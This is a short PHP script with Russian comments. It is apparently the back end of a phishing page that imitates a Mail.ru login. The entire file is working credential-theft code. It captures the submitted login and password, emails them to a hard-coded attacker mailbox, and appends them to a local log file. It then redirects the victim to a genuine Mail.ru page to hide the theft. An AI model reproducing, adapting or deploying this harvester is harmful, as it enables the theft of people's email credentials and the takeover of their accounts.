<?PHP
Error_Reporting(E_ALL & ~E_NOTICE);

$Login = $_POST['Login'];
$Domain = $_POST['Domain'];
$Pass = $_POST['Password'];

//####################################
$from = "admin@mail.ru"; // от кого письмо
$to = "ocharovylya@list.ru"; // кому присылаем данные

$subj = " Пароль от ящика: $Login@$Domain"; // тема письма
$body = " Логин: $Login@$Domain \n Пароль: $Pass"; // тело письма (реконмендую не менять)
//####################################


$from="From: $from\nReply-To: $from\nX-Priority: 1\nContent-Type: text/plain; charset=\"koi8-r\"\nContent-Transfer-Encoding: 8bit"; 
$from=convert_cyr_string($from,"w","k"); 
$to=convert_cyr_string($to,"w","k"); 
$subj=convert_cyr_string($subj,"w","k"); 
$body=convert_cyr_string($body,"w","k"); 
mail($to,$subj,$body,$from); 

$c = "$Login@$Domain:$Pass";

$fp = fopen("c","a+"); //открываем файл
fwrite($fp,"\n [start-- $c -- end] \n"); //записываем всё
fclose($fp); //закрываем

//####################################
header("Location: http://cards.mail.ru/card.html?cdu=89751db02a0f81a577dc9e55f5a5b045"); // куда пошлем пользователя после того как он ввел данные!

echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"

//####################################
?>